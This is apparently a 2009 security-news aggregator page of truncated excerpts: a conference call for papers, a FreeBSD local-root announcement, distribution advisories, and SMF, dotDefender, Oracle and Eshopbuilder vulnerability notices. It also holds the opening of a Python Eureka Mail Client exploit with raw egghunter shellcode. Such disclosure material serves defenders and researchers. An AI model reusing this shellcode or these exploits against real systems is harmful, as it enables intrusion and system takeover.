Home » 2009 » December » 03
The call for papers for the yStS (you Sh0t the Sheriff) conference is now
open!

The 4th edition will be, once again, held in Sao Paulo, Brazil, on May
17th, 2010.


INTRODUCTION

you sh0t the Sheriff is a very unique event dedicated to bringing cutting
edge topics to the top-notch Information Security Community in Brazil.

yStS mixes the highest quality presentations and speakers from all over the
globe, covering diverse topics in information security.

Our goal is to help attendees understand the current state of the
information security world by mixing professionals and topics from
different Infosec segments of the market.

For the most part, yStS is an invite-only event. So, submitting a talk is
certainly a good hack to try to be there, especially if you're local.

Due to the success of previous years' editions, yes, we're keeping the same
format:
* Kicked-back and cool environment
* ... Read more »
Views: 6658 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (7)

** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
******************************
****
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEA ... Read more »
Views: 6050 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200912-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal
    Title: OpenSSL: Multiple vulnerabilities
     Date: December 01, 2009
     Bugs: #270305, #280591, #292022
       ID: 200912-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========
... Read more »
Views: 10929 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

This is the first batch of vulnerabilities found by the SimpleAudit team from elhacker.net
http://labs.elhacker.net/simpleaudit

Our goal is to evaluate the security of SMF 2.0 before using it on our own server, and we have found several security vulnerabilities.

The vulnerabilities that also apply to SMF 1.1.10 were fixed by the SMF team today, on SMF 1.1.11 visit simplemachines.org for details.

You can review the list of the published vulnerabilities in:
http://code.google.com/p/smf2-review/issues/list



 CSRF, RCE   PHP Remote Code Execution SMF2 www.kernel32
 CSRF   CSRF theme change SMF2, SMF1 www.kernel32
 CSRF   Subforum Category ... Read more »
Views: 40132 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (26)

Problem Description
===================

A remote command execution vulnerability exists in the dotDefender
(3.8-5) Site Management.


dotDefender [1] is a web appliaction firewall (WAF) which 'prevents
hackers from attacking your
website.'


Technical Details
=================

The Site Management application of dotDefender is reachable as a web
application (https:site/dotDefender/)
on the webserver. After passing the Basic Auth login you can
create/delete applications.
The mentioned vulnerability is in the 'deletesite' implementation and
the 'deletesitename' variable.
Insufficient input validation allows an attacker to inject arbitrary commands.


Delete Site
===========

A normal delete transaction looks as follow:

 POST /dotDefender/index.cgi HTTP/1.1
 Host: 172.16.159.132
 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; ... Read more »
Views: 6524 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

Hi!
I've just released the working exploit for CTXSYS.DRVXTABC.CREATE_TABLES
injection on Oracle DB 9i/10g (CVE-2009-1991)

You can find the code on my site, http://rawlab.mindcreations.com

In particular,

Classic SQL injection:
http://rawlab.mindcreations.com/codes/exploit/oracle/ctxsys-drvxtabc-create_tables.sql

Cursor injection:
http://rawlab.mindcreations.com/codes/exploit/oracle/ctxsys-drvxtabc-create_tablesV2.sql

Into the site you can find exploits for COMPRESSWORKSPACETREE,
REMOVEWORKSPACE and MERGEWORKSPACE injections (SYS.LT) too.

Reg ... Read more »
Views: 6642 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

##############################
####################################
##################################################################
#          ___   ___  _   _____        __                   _    #
#         / _ \ / _ \| | |  __ \      / _|                 | |   #
#    _ __| | | | | | | |_| |  | | ___| |_ __ _  ___ ___  __| |   #
#   | '__| | | | | | | __| |  | |/ _ \  _/ _` |/ __/ _ \/ _` |   #
#   | |  | |_| | |_| | |_| |__| |  __/ || (_| | (_|  __/ (_| |   #
#   |_|   \___/ \___/ \__|_____/ \___|_| \__,_|\___\___|\__,_|   #
#             ... Read more »
Views: 6350 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)


#2009-017 PHP multiple issues

Description:

PHP, an open source scripting language, suffers from several bugs that may
pose a security risk.

The reported issues have been discovered in several API functions, issues
include buffer overflows, near null reads/writes, arbitrary memory read
and an off-by-one issue. Some of the issues have been previously reported
in older versions of PHP but they either have not been fixed or they were
re-introduced in a later time. The issues have been discovered in both
core and, in some cases, PECL functions/classes/methods.

The following methods have been fixed.

   ibase_pconnect
   ibase_connect
   com_print_typeinfo
   popen
   mssql_connect
   mssql_pconnect
   SplFileObject
   DOMImplementation->
createDocumentType
  &n ... Read more »
Views: 5664 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------
------------------------------------------
Debian Security Advisory DSA-1942-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
November 29, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : wireshark
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)       ... Read more »
Views: 5757 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

================= IUT-CERT =================

Title: Eshopbuilde CMS SQL Injection Vulnerability

Vendor: www.eshopbuilder.ir

Dork: Design by Satcom Co
Type: Input.Validation.Vulnerability (SQL Injection)

Fix: N/A

================== nsec.ir =================

Description:

------------------

Eshopbuilder is a E-shop CMS written in persian language. The Eshopbuilder product is vulnerable to SQL injection.


Vulnerability Variant:

------------------
Injection "/home-f.asp","/opinions-f.
Views: 5570 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200911-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: PEAR Net_Traceroute: Command injection
     Date: November 26, 2009
     Bugs: #294264
       ID: 200911-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An input san ... Read more »
Views: 589 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

#!/usr/bin/env python
##############################
#############################
#
# Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition
# Coded By: k4mr4n_st@yahoo.com
# Found By: k4mr4n (Securitylab.ir Member)
# Tested On: Windows XPSP3 English
# Note: This script sets up a fake SMTP server
# Note: Set the client to this address and check your mail
#
##########################################################

import sys, socket

# egghunter (32 bytes)
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # this is the egg: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# windows/shell_bind_tcp - 368 bytes ... Read more »
Views: 7205 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

Dear List,

I  updated  the  whitepaper  with  a  lot  of  new  information,  some
leveraging  the  vulnerability  in  other  ways  that certainly increase
the effectiveness and impact of this vulnerability.

A brief warning to those that think they are safe because they
don't   accept   client-side   renegotiations   (server  + openssl). I
came across major websites where the SSL loadbalancer in front of the HTTPS
servers were vulnerable. Although the servers were patched it still was
possible   to  perform  the  attacks  (The  loadbalancer  merged  both
sessions and handed them as one to the webserver)

Updates :
--------
- Added a simple s_client testcase
- Analysis of FTPS (vendors are encouraged to assess)
- HTTPS : Injecting arbritary _responses_ into the stream
- HT ... Read more »
Views: 581 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)